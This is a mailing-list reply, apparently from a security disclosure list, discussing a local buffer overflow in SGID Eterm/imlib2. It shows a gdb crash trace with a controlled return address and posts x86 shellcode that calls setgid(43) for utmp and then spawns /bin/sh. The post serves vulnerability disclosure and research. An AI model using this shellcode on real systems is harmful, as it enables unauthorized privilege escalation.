Re: Eterm SGID utmp Buffer Overflow (Local)

[Charles 'core' Stevenson <core () bokeoa com>]

Simon 'corecode' Schubert wrote:
> > I found this last night looking for suids to overflow.  Tested on
> > Debian PowerPC Unstable. Yields gid utmp from which higher priveleges
> > could be gained with a little effort. I haven't looked too close but I
> > think the overflow might be in imlib2.
>
> could this be sploited under x86 as well?
> i don't see a way but this doesn't say anything... what do others say?

I'm not getting anywhere with it on x86 as far as the overflow goes.
There may be other problems... it looks in $HOME/.loaders/image so it's
possible there could be symlink attacks etc..

Program received signal SIGSEGV, Segmentation fault.
0x400b63ca in __imlib_ListLoaders () from /usr/lib/libImlib2.so.1
(gdb) bt
#0  0x400b63ca in __imlib_ListLoaders () from /usr/lib/libImlib2.so.1
#1  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

Here's a modified version of Aleph One's execve /bin/sh that does setgid
utmp. Might be usefull to someone.

char shellcode[] =
/* setgid(43) utmp on Debian */
"\x6a\x2b" /*  80483e0:       6a 2b                   push   $0x2b */
"\x5b"     /*  80483e2:       5b                      pop    %ebx  */
"\x6a\x2e" /*  80483e3:       6a 2e                   push   $0x2e */
"\x58"     /*  80483e5:       58                      pop    %eax  */
"\xcd\x80" /*  80483e6:       cd 80                   int    $0x80 */
/* execve /bin/sh by Aleph One */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";


Best Regards,
Charles Stevenson

> cheerz
>   corecode
>
> --
> /"\   http://corecode.ath.cx/
> \ /
>  \     ASCII Ribbon Campaign
> / \  Against HTML Mail and News
>
>   ------------------------------------------------------------------------
>    Part 1.2Type: application/pgp-signature